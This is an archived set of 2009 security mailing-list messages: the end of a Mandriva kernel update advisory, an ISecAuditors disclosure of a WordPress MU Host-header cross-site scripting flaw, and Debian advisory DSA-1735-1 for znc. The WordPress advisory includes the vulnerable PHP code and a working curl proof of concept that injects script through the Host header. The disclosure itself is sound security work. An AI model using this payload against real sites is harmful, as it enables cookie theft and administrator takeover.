761d4252d5a634d7b68484654cc0c6f4 2009.0/x86_64/lirc-kernel-2.6.27.19-server-1mnb-0.8.3-4.1mdv2009.0.x86_64.rpm
1611d28f62c09178611cbb1f643b8517 2009.0/x86_64/lirc-kernel-desktop-latest-0.8.3-1.20090305.4.1mdv2009.0.x86_64.rpm
4548201380e59535fad83971e381868c 2009.0/x86_64/lirc-kernel-server-latest-0.8.3-1.20090305.4.1mdv2009.0.x86_64.rpm
e0fd82beeb5644a8d208639cfe6a1880 2009.0/x86_64/lzma-kernel-2.6.27.19-desktop-1mnb-4.43-24mdv2009.0.x86_64.rpm
a88de7188ab65a775889adb2d23b080e 2009.0/x86_64/lzma-kernel-2.6.27.19-server-1mnb-4.43-24mdv2009.0.x86_64.rpm
f337057f4e00042104410725e197303d 2009.0/x86_64/lzma-kernel-desktop-latest-4.43-1.20090305.24mdv2009.0.x86_64.rpm
020f89819c19da83063218d4766b8413 2009.0/x86_64/lzma-kernel-server-latest-4.43-1.20090305.24mdv2009.0.x86_64.rpm
1f7cf883e9499420a18ec986cd57aea0 2009.0/x86_64/madwifi-kernel-2.6.27.19-desktop-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm
b154f305a18dd763738662285f68866d 2009.0/x86_64/madwifi-kernel-2.6.27.19-server-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm
f61ef782f2c0df742f26cf9b179a37aa 2009.0/x86_64/madwifi-kernel-desktop-latest-0.9.4-1.20090305.3.r3835mdv2009.0.x86_64.rpm
e2f882b261824131cd96e5f2844f44b7 2009.0/x86_64/madwifi-kernel-server-latest-0.9.4-1.20090305.3.r3835mdv2009.0.x86_64.rpm
5fcf3d07a37f03fd0e0c323e5beab5d9 2009.0/x86_64/nvidia173-kernel-2.6.27.19-desktop-1mnb-173.14.12-4mdv2009.0.x86_64.rpm
698a965b2e4962e29d5dd221a5d6e0a3 2009.0/x86_64/nvidia173-kernel-2.6.27.19-server-1mnb-173.14.12-4mdv2009.0.x86_64.rpm
33872eb702bcd3a66d5ab9a24f2e4e69 2009.0/x86_64/nvidia173-kernel-desktop-latest-173.14.12-1.20090305.4mdv2009.0.x86_64.rpm
ac6a2f84c8a345d7fbbe808f226d7cba 2009.0/x86_64/nvidia173-kernel-server-latest-173.14.12-1.20090305.4mdv2009.0.x86_64.rpm
54e35a4e449be53d14def7cce756db43 2009.0/x86_64/nvidia71xx-kernel-2.6.27.19-desktop-1mnb-71.86.06-5mdv2009.0.x86_64.rpm
2a1d611084255a706d1a1caeff9938da 2009.0/x86_64/nvidia71xx-kernel-2.6.27.19-server-1mnb-71.86.06-5mdv2009.0.x86_64.rpm
7ad6d2f7d91ba0d2ed17927b46770c46 2009.0/x86_64/nvidia71xx-kernel-desktop-latest-71.86.06-1.20090305.5mdv2009.0.x86_64.rpm
7dee24375ad2f8658cfc0b991c6438bc 2009.0/x86_64/nvidia71xx-kernel-server-latest-71.86.06-1.20090305.5mdv2009.0.x86_64.rpm
58296d27a410da24e71c6cfb8b4bbd85 2009.0/x86_64/nvidia96xx-kernel-2.6.27.19-desktop-1mnb-96.43.07-5mdv2009.0.x86_64.rpm
fce105a626259ab22c9b6de5e7a4d23b 2009.0/x86_64/nvidia96xx-kernel-2.6.27.19-server-1mnb-96.43.07-5mdv2009.0.x86_64.rpm
bd580579b6ebc027cb19303892c555ec 2009.0/x86_64/nvidia96xx-kernel-desktop-latest-96.43.07-1.20090305.5mdv2009.0.x86_64.rpm
cc5fb987090ed0454d38e8dc8179362d 2009.0/x86_64/nvidia96xx-kernel-server-latest-96.43.07-1.20090305.5mdv2009.0.x86_64.rpm
4d853da443ce7f4fc22bcb524d51feb5 2009.0/x86_64/nvidia-current-kernel-2.6.27.19-desktop-1mnb-177.70-2.3mdv2009.0.x86_64.rpm
6c7bc57f5694553f70acdf49eedbb044 2009.0/x86_64/nvidia-current-kernel-2.6.27.19-server-1mnb-177.70-2.3mdv2009.0.x86_64.rpm
2ca2fb5dca6ad32e9dbab33259c96a35 2009.0/x86_64/nvidia-current-kernel-desktop-latest-177.70-1.20090305.2.3mdv2009.0.x86_64.rpm
1aaff751a4d8d04b74c6ec119169ced4 2009.0/x86_64/nvidia-current-kernel-server-latest-177.70-1.20090305.2.3mdv2009.0.x86_64.rpm
ffad5a84170c25ceb1f8552ef31ac147 2009.0/x86_64/omfs-kernel-2.6.27.19-desktop-1mnb-0.8.0-1mdv2009.0.x86_64.rpm
89a5474f43a9bde0a59888052aed95b3 2009.0/x86_64/omfs-kernel-2.6.27.19-server-1mnb-0.8.0-1mdv2009.0.x86_64.rpm
7e3990cf08f238b4473fd4017e9734c1 2009.0/x86_64/omfs-kernel-desktop-latest-0.8.0-1.20090305.1mdv2009.0.x86_64.rpm
9db64d8523f5d5d2c5d75264503d2e4f 2009.0/x86_64/omfs-kernel-server-latest-0.8.0-1.20090305.1mdv2009.0.x86_64.rpm
657af4cd858fdd95ae4d33671428ae9c 2009.0/x86_64/omnibook-kernel-2.6.27.19-desktop-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm
c42d43d9fd29d0f5135c3bccee290b75 2009.0/x86_64/omnibook-kernel-2.6.27.19-server-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm
462d46337719d8f30eca084b132b9104 2009.0/x86_64/omnibook-kernel-desktop-latest-20080513-1.20090305.0.274.1mdv2009.0.x86_64.rpm
6a83224d8d95cf30298e3f2e50211af6 2009.0/x86_64/omnibook-kernel-server-latest-20080513-1.20090305.0.274.1mdv2009.0.x86_64.rpm
533cc0bffadf7115347855474fa4554f 2009.0/x86_64/opencbm-kernel-2.6.27.19-desktop-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm
300287e1b56e25613fd3bee1dd04b6d3 2009.0/x86_64/opencbm-kernel-2.6.27.19-server-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm
09dafc1813fe981ed66fe16042cd59a2 2009.0/x86_64/opencbm-kernel-desktop-latest-0.4.2a-1.20090305.1mdv2008.1.x86_64.rpm
0ecba5bbba31aeb31a5089e8eccd8585 2009.0/x86_64/opencbm-kernel-server-latest-0.4.2a-1.20090305.1mdv2008.1.x86_64.rpm
d27c3bd96bebaf3fb3bf757f8706a136 2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.19-desktop-1mnb-1.5.9-2mdv2009.0.x86_64.rpm
6963619375ff7d87d71b4623fe9aacb0 2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.19-server-1mnb-1.5.9-2mdv2009.0.x86_64.rpm
97f770c1d1973765a74116e74f83f76f 2009.0/x86_64/ov51x-jpeg-kernel-desktop-latest-1.5.9-1.20090305.2mdv2009.0.x86_64.rpm
7962203a76f2f3dfdc902ff9cf7c953f 2009.0/x86_64/ov51x-jpeg-kernel-server-latest-1.5.9-1.20090305.2mdv2009.0.x86_64.rpm
5a3a9b22256a67fdcaaed7d27aaf247a 2009.0/x86_64/qc-usb-kernel-2.6.27.19-desktop-1mnb-0.6.6-6mdv2009.0.x86_64.rpm
f9f8597da918bfbb4c345dd72ce699ca 2009.0/x86_64/qc-usb-kernel-2.6.27.19-server-1mnb-0.6.6-6mdv2009.0.x86_64.rpm
cd6f9bb9d3ea087ea8789fac4cf13774 2009.0/x86_64/qc-usb-kernel-desktop-latest-0.6.6-1.20090305.6mdv2009.0.x86_64.rpm
2625e03a247632e9ff95bfd9a3844b5d 2009.0/x86_64/qc-usb-kernel-server-latest-0.6.6-1.20090305.6mdv2009.0.x86_64.rpm
2f364964b9ddf576ef8792b57fb12bb9 2009.0/x86_64/rt2860-kernel-2.6.27.19-desktop-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm
e96a4fac685babafd1a85acf0d13b063 2009.0/x86_64/rt2860-kernel-2.6.27.19-server-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm
b4e1522684da16352be8120fd4672a41 2009.0/x86_64/rt2860-kernel-desktop-latest-1.7.0.0-1.20090305.2mdv2009.0.x86_64.rpm
222824ce80aafdc3c3f4c0a0fb4ce656 2009.0/x86_64/rt2860-kernel-server-latest-1.7.0.0-1.20090305.2mdv2009.0.x86_64.rpm
a55c01c1064c2cb524b2d0a57fad7899 2009.0/x86_64/rt2870-kernel-2.6.27.19-desktop-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm
9b347a866df30a8fffb1f60ac97e73bc 2009.0/x86_64/rt2870-kernel-2.6.27.19-server-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm
fefdd7241fda64e94d2a82202aef75a0 2009.0/x86_64/rt2870-kernel-desktop-latest-1.3.1.0-1.20090305.2mdv2009.0.x86_64.rpm
3dc8db9f95fc132980a658a1cd363d06 2009.0/x86_64/rt2870-kernel-server-latest-1.3.1.0-1.20090305.2mdv2009.0.x86_64.rpm
29c21ad84f0ea16b01c63a06d3b4bd2d 2009.0/x86_64/rtl8187se-kernel-2.6.27.19-desktop-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm
4fa0f9d80f7dc4dcd16d9bc6a72e6335 2009.0/x86_64/rtl8187se-kernel-2.6.27.19-server-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm
9124cb04b513662bb18a8e24c7e876ad 2009.0/x86_64/rtl8187se-kernel-desktop-latest-1016.20080716-1.20090305.1.1mdv2009.0.x86_64.rpm
da922ca9c28f8c96e98b1a02b45d0001 2009.0/x86_64/rtl8187se-kernel-server-latest-1016.20080716-1.20090305.1.1mdv2009.0.x86_64.rpm
edac2bbf546e810f7b85aa3cb544da2f 2009.0/x86_64/squashfs-lzma-kernel-2.6.27.19-desktop-1mnb-3.3-5mdv2009.0.x86_64.rpm
85c6b227048882dc6a6b776a5089f498 2009.0/x86_64/squashfs-lzma-kernel-2.6.27.19-server-1mnb-3.3-5mdv2009.0.x86_64.rpm
c1104878f9ddc6cbbb5e71d3920a3eb2 2009.0/x86_64/squashfs-lzma-kernel-desktop-latest-3.3-1.20090305.5mdv2009.0.x86_64.rpm
7c59d3ba6bf8a2ca2cf1479021e7af80 2009.0/x86_64/squashfs-lzma-kernel-server-latest-3.3-1.20090305.5mdv2009.0.x86_64.rpm
d385f5a1b4370ee2190d72da0f52a009 2009.0/x86_64/tp_smapi-kernel-2.6.27.19-desktop-1mnb-0.37-2mdv2009.0.x86_64.rpm
3a43418feeeb687ebcce98aad913a50d 2009.0/x86_64/tp_smapi-kernel-2.6.27.19-server-1mnb-0.37-2mdv2009.0.x86_64.rpm
a1eae4d2c61670a4555a9db1d3c84574 2009.0/x86_64/tp_smapi-kernel-desktop-latest-0.37-1.20090305.2mdv2009.0.x86_64.rpm
5b98e5133711e05ed82eeacebcd1e489 2009.0/x86_64/tp_smapi-kernel-server-latest-0.37-1.20090305.2mdv2009.0.x86_64.rpm
a8c0fb243bd0cffa8edaa5c54c3d4066 2009.0/x86_64/vboxadd-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
41cf8b0414fa7b42196dda9e3e367eb5 2009.0/x86_64/vboxadd-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
e60e6d30a41fd20bcc34df7c6ff2b0a5 2009.0/x86_64/vboxadd-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
efad3e1b017464261372a3cdae1fcf0f 2009.0/x86_64/vboxadd-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
85f212a24b6c3dece94dc706ebe9de6c 2009.0/x86_64/vboxvfs-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
ea95c63ce5c1aa22ab9d4428191acabd 2009.0/x86_64/vboxvfs-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
e8d4855313f4b34d6cf66c7174cdbc22 2009.0/x86_64/vboxvfs-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
49affcf4169fd470773682ba7c29b532 2009.0/x86_64/vboxvfs-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
decf73786e408c2d3aaf5e269aef3ab3 2009.0/x86_64/vhba-kernel-2.6.27.19-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm
31ebd1c8bc486c9b6eb29c1eda41cca7 2009.0/x86_64/vhba-kernel-2.6.27.19-server-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm
d68fc51e2613269f22e75a9bd5872e86 2009.0/x86_64/vhba-kernel-desktop-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.x86_64.rpm
eeb0afd3c1bf0e284aff368914e416a4 2009.0/x86_64/vhba-kernel-server-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.x86_64.rpm
4f575fa1d0967656870bf461f9d3b067 2009.0/x86_64/virtualbox-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
d3576bd63a4ef2d3603b4e0fb0fb37a1 2009.0/x86_64/virtualbox-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.x86_64.rpm
2bd1b82379e3a9d2341b35dde3efdecd 2009.0/x86_64/virtualbox-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
f8779230ba2a60228184053dcde0a4ba 2009.0/x86_64/virtualbox-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.x86_64.rpm
18aee2aa6a87006b9229d1e5bca092dd 2009.0/x86_64/vpnclient-kernel-2.6.27.19-desktop-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm
c885a407da7d14613ece90e6d4ea5a7e 2009.0/x86_64/vpnclient-kernel-2.6.27.19-server-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm
614573e35b8982a5073b989cd6669c2a 2009.0/x86_64/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20090305.3mdv2009.0.x86_64.rpm
5d79336c31a6c1099865ac1e8193c4b7 2009.0/x86_64/vpnclient-kernel-server-latest-4.8.01.0640-1.20090305.3mdv2009.0.x86_64.rpm
9449cc7da776f4b2a5f72e386f555cbc 2009.0/SRPMS/kernel-2.6.27.19-1mnb2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJto5jmqjQ0CJFipgRAliSAJ4/Zrt9grTaDNqeVV34DLo0t0eyxQCbBp2S
5afYb1X9p6Q4ZcMqJVPnPdw(P0
-----END PGP SIGNATURE-----
From - Tue Mar 10 16:51:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068a3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39707-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B0F66ED8B5
for <lists@securityspace.com>; Tue, 10 Mar 2009 16:41:48 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B9569236FA0; Tue, 10 Mar 2009 13:25:34 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27634 invoked from network); 10 Mar 2009 19:48:57 -0000
Message-ID: <49B6CD06.10201@isecauditors.com>
Date: Tue, 10 Mar 2009 21:26:46 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Organization: Internet Security Auditors
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugs@securitytracker.com, news@securiteam.com,
full-disclosure@lists.grok.org.uk, vuln@secunia.com,
packet@packetstormsecurity.org, bugtraq@securityfocus.com
Subject: [ISecAuditors Security Advisories] WordPress MU HTTP Header XSS Vulnerability
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:
============================================INTERNET SECURITY AUDITORS ALERT 2009-004
- Original release date: December 3rd, 2008
- Last revised: March 10th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.3/10 (CVSS scored)
============================================
I. VULNERABILITY
-------------------------
WordPress MU < 2.7 'Host' HTTP Header Cross Site Scripting (XSS)
Vulnerability
II. BACKGROUND
-------------------------
WordPress MU, or multi-user, allows to run unlimited blogs with a
single install of wordpress. It is most famously used for
WordPress.com where it serves tens of millions of hits on hundreds of
thousands of blogs each day. Also is used in many other sites like
Harvard University and Le Monde.
III. DESCRIPTION
-------------------------
WordPress MU prior to version 2.7 fails to sanitize the Host header
correctly in choose_primary_blog function and is therefore prune to
XSS attacks.
Web Sites running in a name based virtual hosting setup are not
affected while they are not the default virtual host.
IV. PROOF OF CONCEPT
-------------------------
The snippet of vulnerable code:
In wp-includes/wpmu-functions.php, concretly in the function
choose_primary_blog:
1830 function choose_primary_blog() {
1831 global $current_user;
1832 ?>
1833 <table class="form-table">
1834 <tr>
1835 <th scope="row"><?php _e('Primary Blog'); ?></th>
1836 <td>
1837 <?php
1838 $all_blogs = get_blogs_of_user( $current_user->ID );
1839 if( count( $all_blogs ) > 1 ) {
1840 $primary_blog = get_usermeta($current_user->ID,
'primary_blog');
1841 ?>
1842 <select name="primary_blog">
1843 <?php foreach( (array) $all_blogs as $blog ) { ?>
1844 <option value='<?php echo $blog->userblog_id
?>'<?php if( $primary_blog == $blog->userblog_id ) echo '
selected="selected"' ?>>
http://<?php echo $blog->domain.$blog->path
?></option>
1845 <?php } ?>
1846 </select>
1847 <?php
1848 } else {
1849 echo $_SERVER['HTTP_HOST']; <- HERE
1850 }
1851 ?>
1852 </td>
1853 </tr>
1854 </table>
1855 <?php
1856 }
The line 1849 contains the affected code "echo $_SERVER['HTTP_HOST'];"
and is possible to inject HTML and script code crafting HTTP Host header:
PoC:
$ curl -H "Cookie: my cookies here" -H "Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html
The javascript code will be executed in the context of the victim
browser, this can be exploited to steal cookies and escalate
privileges to administrator.
Tested with Wordpress MU 2.6.5, Apache 2.2 and Mozilla Firefox 3.0.6
V. BUSINESS IMPACT
-------------------------
The impact is the attacker can gain administrator privileges on the
application.
VI. SYSTEMS AFFECTED
-------------------------
Versions prior to 2.7 are affected
VII. SOLUTION
-------------------------
Upgrade to version 2.7 of wordpress multi-user. It can be downloaded
from
http://mu.wordpress.org
VIII. REFERENCES
-------------------------
http://mu.wordpress.org
IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
December 03, 2008: Initial release
March 02, 2009: More details added
XI. DISCLOSURE TIMELINE
-------------------------
December 03, 2008: Vendor contacted
December 03, 2008: MU trunk code fixed
January 28, 2008: WordPress MU 2.7 released
March 10, 2009: Vulnerability published by
Internet Security Auditors (www.isecauditors.com)
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
From - Tue Mar 10 17:01:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068a4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39708-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C6443ED5DA
for <lists@securityspace.com>; Tue, 10 Mar 2009 16:52:09 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6F75B236FB1; Tue, 10 Mar 2009 13:25:48 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27659 invoked from network); 10 Mar 2009 19:50:19 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client!2.9.189.167> <helo=mail.enyo.de> <from=fw@deneb.enyo.de> <to�bian-security-announce@lists.debian.org>, rate: -6.1
From: Florian Weimer <fw@deneb.enyo.de>
Date: Tue, 10 Mar 2009 21:23:49 +0100
Message-ID: <87eix5ktyi.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level:
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1735-1] New znc packages fix privilege escalation
Priority: urgent
Resent-Message-ID: <OoYMMhkhJ8H.A.97.kxstJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Tue, 10 Mar 2009 20:24:04 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1735-1 security@debian.org
http://www.debian.org/security/ Florian Weimer
March 10, 2009
http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : znc
Vulnerability : missing input sanitization
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2009-0759
Debian Bug : 516950
It was discovered that znc, an IRC proxy/bouncer, does not properly
sanitize input contained in configuration change requests to the
webadmin interface. This allows authenticated users to elevate their
privileges and indirectly execute arbitrary commands (CVE-2009-0759).
For the old stable distribution (etch), this problem has been fixed in
version 0.045-3+etch2.
For the stable distribution (lenny), this problem has been fixed in
version 0.058-2+lenny1.
For the unstable distribution (sid), this problem has been fixed in
version 0.066-1.
We recommend that you upgrade your znc packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Source archives:
http://security.debian.org/pool/updates/main/z/znc/znc_0.045.orig.tar.gz
Size/MD5 checksum: 204863 9a514b125b7514811fd03befa73cce77
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2.dsc
Size/MD5 checksum: 962 1962af4c56b4c4c169832249d6b99f30
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2.diff.gz
Size/MD5 checksum: 12817 c254e989604122fb7267a0fafeddfd95
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_alpha.deb
Size/MD5 checksum: 859792 f154f471d3b0d42d7b7cfe8eebaf3134
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_amd64.deb
Size/MD5 checksum: 793694 80c9126c518abe062265cee5d94ca6f1
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_hppa.deb
Size/MD5 checksum: 857356 04a64d64b5a4582fcd7db3bef32822ec
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_i386.deb
Size/MD5 checksum: 806592 99b63e880bbba2841f30ed006fbe2364
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_ia64.deb
Size/MD5 checksum: 957620 061cfe882476dc4ad55caf16ec8c7af8
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_mips.deb
Size/MD5 checksum: 713450 625f8ed77be76269bd78f4414ed55a61
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_mipsel.deb
Size/MD5 checksum: 710332 5b07981be622bf78839d2376af142e3d
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_powerpc.deb
Size/MD5 checksum: 789838 5c75fc8a345a20c6b6e39e2eb97cd004
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_s390.deb
Size/MD5 checksum: 730066 514965b8fa4913d2e1ff13630bd5957a
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_sparc.deb
Size/MD5 checksum: 747502 6b72758d93bb4ddc392ef6cfa119a5c2
Debian GNU/Linux 4.0 alias lenny
- -------------------------------
Source archives:
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1.dsc
Size/MD5 checksum: 1332 c657b80b61750fc072ce257c1d682b21
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1.diff.gz
Size/MD5 checksum: 8253 04053487dbf0b49da04ded749d1c384e
http://security.debian.org/pool/updates/main/z/znc/znc_0.058.orig.tar.gz
Size/MD5 checksum: 340741 c02fd740c55d5b3a7912f7584344103e
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_alpha.deb
Size/MD5 checksum: 1096362 92f9a65cd06d7da250f79a3d11e0a124
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_amd64.deb
Size/MD5 checksum: 1028438 f2058b3d07a9233cef8f9ca0dfec6673
arm architecture (ARM)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_arm.deb
Size/MD5 checksum: 1149682 3ed9f92e4ca7ee29ff3c60897cc71c21
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_hppa.deb
Size/MD5 checksum: 1163022 359b9459a44f3653e2571cda2fb51085
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_i386.deb
Size/MD5 checksum: 1013106 15b468bd87a584a0415584452d26ab38
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_ia64.deb
Size/MD5 checksum: 1181082 f86b365aa064e782ea72a82d216edd62
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_mips.deb
Size/MD5 checksum: 916040 f6c21df1590da49c335bc76860e5af8d
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_mipsel.deb
Size/MD5 checksum: 906310 d156e11c8c0bedb5dd56fcfcf40730e9
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_powerpc.deb
Size/MD5 checksum: 1034324 29a41349db3b895e1a6bdf0bdf249ff8
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_s390.deb
Size/MD5 checksum: 970792 b0f4f9f9b0e38309fca19dabe60beef4
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_sparc.deb
Size/MD5 checksum: 1000006 ea9cd30f00b2f9466dfeb84e96198099
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iQEcBAEBAgAGBQJJtsx5AAoJEL97/wQC1SS+q8UH/1er3nhvWfhDamiBuVL0Z0Fk
